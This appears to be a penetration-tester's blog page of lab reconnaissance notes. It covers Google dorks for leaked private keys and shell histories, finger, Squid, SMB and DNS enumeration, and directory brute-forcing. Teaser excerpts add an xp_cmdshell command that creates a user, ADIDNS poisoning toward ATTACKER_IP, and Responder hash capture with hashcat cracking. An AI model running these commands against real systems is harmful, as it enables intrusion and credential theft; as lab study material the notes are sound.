Skip to main content

Reconnaissance


Google Enum 

#Finding PGP and GnuPG Private Key rings
site:domain.com intitle:index.of intext:"secring.skr"| "secring.pgp" | "secring.bak"

#Shell History files in interesting domains
site:domain.com intitle:index.of bash_history

#Nessus Scan Results
intitle:"Nessus Scan Report" "This file was generated by Nessus"

SearchDiggity GUI tool
Finger Enumeration

Finger Enum Script
finger @10.10.10.76

perl finger-user-enum.pl -U ../../SecLists/Usernames/Names/names.txt -t 10.10.10.76

finger root@10.10.10.76
Enumerating Squid Proxy

nikto -h 10.10.10.10 -useproxy http://10.10.10.10:3128

get /etc/squid/squid.conf
get /etc/squid/squid.cgf
get /etc/squid/squid.config
Set a profile in foxy proxy to change to the squid proxy and add creds in it to access it properly. 


Burp Settings:

add upstream proxy --> 

destination: * 
host : IP_ADDRESS
port : 3128
Authentication type: Basic
Username: creds
Password: creds

Set foxyproxy to use burp

Go to proxy --> options --> Proxy listeners --> Add
Bind it to port: 80
Request handling  --> redirect to 127.0.0.1 & 80 
Droppescan Usage - Drupal Scan

./droopescan scan drupal -u 10.10.10.9 
File Transfer to Windows Webserver 

python /impacket/build/scripts-3.7/smbserver.py bhanu ~/Desktop/HTB/

SNMP Enum -- > Checklist
 Windows Version Information 


dig axfr @10.10.10.123 friendzoneportal.red

cat zonetransfer | grep friendzone | grep IN | awk '{print $1}' | sed 's/\.$//g' | sort -u > hosts
Mount a SMB Share when you have Credentials 

 mount -t cifs -o username=Finance,password=Acc0unting //10.10.10.59/ACCT /mnt/smb/


cd /mnt/smb/         //we can see the mounted data here
  
cp -r smb ~/Desktop/HTB/tally/     //Copy all the files to your drive
Iterate a number from 1 to 20 in the given Variable and check the difference 

 for i in $(seq 1 20); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>';done
curl 10.11.1.71 -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'    --> Get all the links from a page 
curl 10.11.1.71 -s -L | html2text -width '99' | uniq 

--> get Text in much better readable Format 
gobuster -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,403,500' -e -x php
-->URL Brute forcing using Different word list and filtering with status codes
searchsploit --colour -t php 5.x | grep -v '/dos/' | grep -iv '\.php[^$]'

--> Search for PHP exploits using searchsploit ; remove .php unwanted files
Access a Binary from anywhere 

ln -s /root/Downloads/Tools/dirsearch/dirsearch.py /usr/local/bin/


#Change the binary location
echo $SHELL                  /Determine the shell
Download all the files from a FTP Directory using wget

wget --mirror 'ftp_user:password@10.10.10.10'  

Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Relay Attacks

Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/